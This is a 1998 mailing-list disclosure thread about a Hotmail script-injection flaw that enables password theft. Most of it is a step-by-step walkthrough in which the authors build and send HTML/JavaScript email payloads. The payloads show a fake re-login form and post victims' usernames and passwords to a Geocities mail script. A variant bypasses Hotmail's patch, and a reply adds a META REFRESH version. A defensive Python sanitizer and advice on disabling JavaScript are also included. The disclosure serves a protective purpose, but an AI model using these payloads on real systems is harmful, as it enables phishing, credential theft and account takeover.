Date: Mon, 24 Aug 1998 14:21:56 -0600
From: Tom Cervenka <[email protected]>
Subject: Serious Security Hole in Hotmail
We have just found a serious security hole in Microsoft's Hotmail
service (http://www.hotmail.com) which allows malicious users to easily
steal the passwords of Hotmail users. The exploit involves sending an
e-mail message that contains embedded javascript code. When a Hotmail
user views the message, the javascript code forces the user to re-login
to Hotmail. In doing so, the victim's username and password are sent to
the malicious user by e-mail. (See
http://www.because-we-can.com/hotmail/default.htm for a demo.)
Once a malicious user knows the password to the victim's Hotmail
account, he can assume full control of the account, including the
ability to:
- delete, send, and read the victim's e-mail
- check mail on other mail servers that the victim has configured for mail-checking
- access the victim's address book
- discover other passwords sent as confirmation of registration in old e-mails
- change the password of the Hotmail account
The security problem is dangerously easy to take advantage of. A
would-be hacker needs only to embed the javascript code into the body of
an e-mail message using a standard e-mail program such as Netscape Mail
(free). In a working demonstration and full description of this exploit
at http://www.because-we-can.com/hotmail/default.htm, it is shown that
even users without their own internet service provider (ISP) can steal
an arbitrary number of Hotmail passwords by using a free Geocities
account.
The "Hot"mail exploit is a serious security concern for the following
reasons:
1. The malicious code runs as soon as the e-mail message is viewed.
2. The resources required to launch the attack are minimal and freely available.
3. The malicious e-mail can be sent from virtually anywhere, including libraries, internet cafes, or classroom terminals.
4. The exploit will work with any javascript-enabled browser, including Microsoft Internet Explorer and Netscape Communicator.
Both Microsoft and Hotmail have been notified that a security problem
exists. The following information about the "Hot"Mail exploit is being
made publicly available to speed the process of fixing the security hole
and inform users how they can protect themselves. This information is
also being released in the belief that when the public is aware of
serious security problems, expedient measures are taken by software
manufacturers to solve those problems.
--------------------------------------------------------------------------
Date: Tue, 25 Aug 1998 07:38:14 -0400
From: Jeff Mcadams <[email protected]>
Subject: Re: Serious Security Hole in Hotmail
Thus spake Tom Cervenka
>We have just found a serious security hole in Microsoft's Hotmail
>service (http://www.hotmail.com) which allows malicious users to easily
>steal the passwords of Hotmail users. The exploit involves sending an
>e-mail message that contains embedded javascript code. When a Hotmail
>user views the message, the javascript code forces the user to re-login
>to Hotmail. In doing so, the victim's username and password are sent to
>the malicious user by e-mail. (See
>http://www.because-we-can.com/hotmail/default.htm for a demo.)
This is a variation on the Spartan Horse announced by Dan Gregorie over
a week ago, and covered on news.com on the 14th. The Spartan Horse is
available for viewing at:
http://www.thetopoftheworld.com
The news.com article is at:
http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d
The variation is that the Spartan Horse, as designed on the
www.thetopoftheworld.com site, mimics the Windows95/98
Dial-Up-Networking dialog box.
This wasn't originally sent to BUGTRAQ because it doesn't exploit a
specific flaw in programming code in any software, like this "Hot"Mail
exploit. Perhaps that was an oversight on Dan's and my fault, but I
did want to set the record straight on the origination of this idea for
Dan's sake.
--
Jeff McAdams Email: [email protected]
Head Network Administrator Voice: (502) 966-3848
IgLou Internet Services (800) 436-4456
--------------------------------------------------------------------------
Date: Tue, 25 Aug 1998 16:31:47 -0400
From: "Jonathan A. Zdziarski - Systems Administrator"
<[email protected]>
Subject: Re: Serious Security Hole in Hotmail
It appears that Hotmail put a fix in for this by s/<script>/<comment>/ or
some variation, when you view a message.
Thank you,
Jonathan A. Zdziarski
Senior Systems Administrator
Netrail, Inc.
888.NET.RAIL x242
--------------------------------------------------------------------------
Date: Tue, 25 Aug 1998 20:14:07 +0200
From: Jonathan James <[email protected]>
Subject: SV: Serious Security Hole in Hotmail
Hello everybody.
I studied Mr. Cervenka's e-mail and then started to experiment.
There is a way to do this to a browser that has JavaScript disabled.
Just put a META REFRESH tag into the HTML file; the URL should point to the
URL which contains the actual capturing and sending of the password/login.
This is shown in an example below.
<html>
<meta http-equiv="refresh" content="1; url=the-url-that-is-to-be-pointed-to">
and so on.....
Thank you for your time.
Regards
Jonathan James
--------------------------------------------------------------------------
"HOT"MAIL EXPLOIT TARGETING NETSCAPE 4.0X USERS
This page demonstrates how we used the "Hot"Mail exploit with minimal
resources to steal passwords from Hotmail users. Our goal was to show
that using only the items listed below, we could steal a victim's
Hotmail password and remain anonymous. The following version of the
exploit has been patched by Hotmail as of Monday, August 25, 1998.
Click here to see a variation of the "Hot"Mail exploit that works
despite Hotmail's fix.
INGREDIENTS:
* 1 Computer with Internet Access
* 1 Netscape Mail (or equivalent e-mail program)
* 1 Notepad (or equivalent text editor)
STEP 1:
We visited hotmail.com and registered for a free e-mail account. We
did not have to enter valid contact information during the
registration process.
STEP 2:
We visited Geocities.com and registered for a free homepage. We chose
the username ybwc. We did not have to enter valid contact information
during the registration process, except for an e-mail address. We used
the e-mail address from step 1. As part of our registration, we were
given a new free email account from Geocities ([email protected]).
STEP 3:
We opened our notepad and typed in the following text, which we then
saved as message.htm. Line 17 contains our Geocities username (ybwc),
from step 2.
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\" target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"> <input type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";
}
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}
</script>
</body>
</html>
STEP 4: We composed a new e-mail message to our (example) victim,
[email protected]. We inserted the file message.htm into the e-mail
message and then sent it.
STEP 5: We waited for our victim to check his Hotmail account. Shortly
after he viewed our message, we checked our Geocities email. We
received an e-mail message from Geocities that listed the IP address,
username, and password of the Hotmail user [email protected].
--------------------------------------------------------------------------
"HOT"MAIL EXPLOIT TARGETING ANY JAVASCRIPT-ENABLED BROWSER
This page describes how users with moderate resources (web-space with
an Internet Service Provider) can use "Hot"Mail against users of any
javascript-enabled browser. We required no resources or special
hardware beyond what is listed below. Hotmail has issued a patch for
the problem; however, we have discovered a problem with their fix. The
following describes how we stole passwords from Netscape Navigator
4.0x users after Hotmail posted a fix on the morning of Monday August
25, 1998.
INGREDIENTS:
* 1 Computer with internet access
* 1 Netscape Mail (or equivalent e-mail program)
* 1 Notepad (or equivalent text editor)
* web-page space
STEP 1:
We visited hotmail.com and registered for a free e-mail account. We
did not have to enter valid contact information during the
registration process.
STEP 2:
We visited Geocities.com and registered for a free homepage. We chose
the username ybwc. We did not have to enter valid contact information
during the registration process, except for an e-mail address. We used
the e-mail address from step 1. As part of our registration, we were
given a new free email account from Geocities ([email protected]).
STEP 3:
We opened our notepad and typed in the following text, which we then
saved as getmsg.htm. Then we uploaded the file onto our web-space.
Line 14 contains our Geocities username (ybwc), from step 2.
<html><head></head>
<body bgcolor="#ffffff" link="#000099" vlink="#000099">
<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>
<tr valign=middle><th colspan=2>
<font face="Arial, Helvetica" size="5">We're Sorry, We Cannot<br>
Process Your Request</font>
</th></tr>
<tr valign=middle><td align=center>
<font face="Arial, Helvetica" size="3">Reason: </font>
<font face="Arial, Helvetica" size="3" color="#ff0000"><b>Time expired. Please re-login.</b></font><br>
<font face="Arial, Helvetica" size="2"><a href="http://www.hotmail.com/errormsg.html">(Get more info regarding error messages here)</a></font>
</td></tr>
<tr valign="middle"><td align="center">
<FORM METHOD=POST ACTION="http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc" target="_top">
<INPUT TYPE="hidden" NAME="next-url" VALUE="http://www.hotmail.com">
<INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password">
<table cellpadding="0" cellspacing="5" border="0">
<tr><td><font face="Arial, Helvetica" size="2">Login Name:</font><br><input type="text" name="login" size="16" maxlength="16"></td><td><font face="Arial, Helvetica" size="2">Password:</font><br><input type="password" name="passwd" size="16" maxlength="16"> <input type="submit" value="Enter"></td><tr>
</table></form></td></tr>
<tr valign=middle><th colspan=2 align=center>
<font face="Arial, Helvetica" size="3">Return to <a href="http://welcome.to/www.hotmail.com" target="_parent">Hotmail's Homepage</a>.
</font></th></tr></table>
<p><img src="http://209.1.112.251/c9698.gif" width=189 height=16 border=0 alt="Copyright 1996-1997">
</body></html>
STEP 4:
We opened our notepad and typed in the following text, which we then
saved as message.htm. Line 4 contains the URL of the file getmsg.htm
from step 3.
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<img
src="javascript:errurl='http://www.because-we-can.com/users/anon/hotmail/getmsg.htm';
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){top.submenu.document.links[i].target='work';
top.submenu.document.links[i].href=errurl;}noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){top.work.document.links[i].target='work';
top.work.document.links[i].href=errurl;}">
</body>
</html>
STEP 5: We composed a new e-mail message to our victim,
[email protected]*. We inserted the file message.htm into the e-mail
message and then sent it.
STEP 6: We waited for our victim to check his Hotmail account. Shortly
after he viewed our message, we checked our Geocities email. It
contained an e-mail message from Geocities that listed the IP address,
username, and password of the Hotmail user [email protected].
--------------------------------------------------------------------------
HOW THE "HOT"MAIL EXPLOIT WORKS
Why does the "Hot"Mail exploit work? The security problem lies in
Microsoft's Hotmail service itself. Hotmail makes no attempt to filter
Javascript code from email messages, allowing malicious users to embed
arbitrary javascript programs into their e-mail messages. Javascript
programs do not normally constitute a security problem when they are
used in personal web-pages. However, when javascript code is embedded
into a Hotmail message, it can alter the properties of the Hotmail
user-interface itself.
In the case of the exploits we describe, the javascript alters the
properties of every link in the Hotmail interface that the user could
click on. The links are altered so that when the user clicks on them,
a bogus Hotmail message is displayed, informing the user that they
have timed out of their Hotmail session and must log in again to
continue. The bogus time-out page also gives the user some
text-entry fields where they can type in their username and password
to re-login. However, when the user types in their username and
password, the information is sent back to the malicious user.
In the exploits we describe, the part of the program that does the
actual "dirty work" of mailing the password and username is provided
by Geocities as a (free) service to all their members. This should not
be viewed as an oversight or problem with Geocities, since there are
thousands of equivalent server-side mailing programs that we could
have used in its place.
The "Hot"Mail exploit is just one of many potentially damaging
javascript programs that could be embedded into mail messages. Since
javascript code in email messages can run as soon as the message is
viewed, and can alter virtually any aspect of the user interface, we
urge Hotmail to implement a javascript filter.
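The two kinds of filter this thread contrasts, as an added example that is not part of the original thread or of Hotmail's code: the s/<script>/<comment>/ rewrite Zdziarski reports beside an allowlist filter of the kind this section asks for, both run over constructed messages carrying the thread's three vectors (the <script> block, the <img src="javascript:..."> variant, and James's META REFRESH). The tag and attribute lists and the example.invalid host are assumptions.

```python
import html
import re
from html.parser import HTMLParser

# Allowlist of tags and attributes a webmail renderer may pass through; everything else is dropped.
ALLOWED_TAGS = {"p", "br", "b", "i", "a", "img", "table", "tr", "td", "th", "font"}
ALLOWED_ATTRS = {"href", "src", "alt", "width", "height", "border", "face", "size", "color"}
SAMPLES = {  # constructed samples modelled on the thread's three vectors; example.invalid is a placeholder
    "script": '<p>hi</p><script>top.work.document.links[0].href="javascript:getmess()"</script>',
    "img_js": "<img src=\"javascript:errurl='http://example.invalid/getmsg.htm';top.work.location=errurl\">",
    "meta": '<meta http-equiv="refresh" content="1;url=http://example.invalid/getmsg.htm">',
}

def naive_filter(message):
    # The fix reported in the thread: rename <script> to <comment> and render everything else.
    return re.sub(r"<(/?)script\b", r"<\1comment", message, flags=re.IGNORECASE)

def safe_url(value):
    # Allow http(s)/mailto/relative URLs only; strip whitespace so "java script:" is caught too.
    v = re.sub(r"\s", "", value).lower()
    return ":" not in v or v.startswith(("http://", "https://", "mailto:"))

class AllowlistFilter(HTMLParser):
    def __init__(self):
        super().__init__()
        self.out, self.skip = [], 0
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.skip += 1  # swallow the script body too: it must not be rendered, even as text
        if tag not in ALLOWED_TAGS or self.skip:
            return  # <meta>, <form>, <iframe>, ... never reach the output
        kept = [(n, v or "") for n, v in attrs if n in ALLOWED_ATTRS and (n not in ("href", "src") or safe_url(v or ""))]
        self.out.append(f"<{tag}" + "".join(f' {n}="{html.escape(v)}"' for n, v in kept) + ">")
    def handle_endtag(self, tag):
        if tag == "script":
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS and not self.skip:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data))

def allowlist_filter(message):
    f = AllowlistFilter()
    f.feed(message)
    f.close()
    return "".join(f.out)

def still_active(rendered):  # does the output still carry a script tag, a javascript: URL or a refresh?
    return any(m in rendered.lower() for m in ("<script", "javascript:", "http-equiv"))
```

Because HTMLParser decodes entity references in attribute values before the filter sees them, an obfuscated "&#106;avascript:" href is caught by the same scheme check.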
--------------------------------------------------------------------------
HOW TO PROTECT YOURSELF FROM "HOT"MAIL
Until Hotmail fixes the security problem, we suggest that Hotmail
users turn off javascript in their browsers. Even users familiar with
our version of the exploit may be vulnerable to other javascript
programs embedded in Hotmail messages.
Netscape users can turn javascript off in their preferences (edit /
preferences / advanced / disable javascript).
Microsoft Internet Explorer users can turn jscript off in their
preferences (view / internet options / security / custom settings /
scripting / disable active scripting).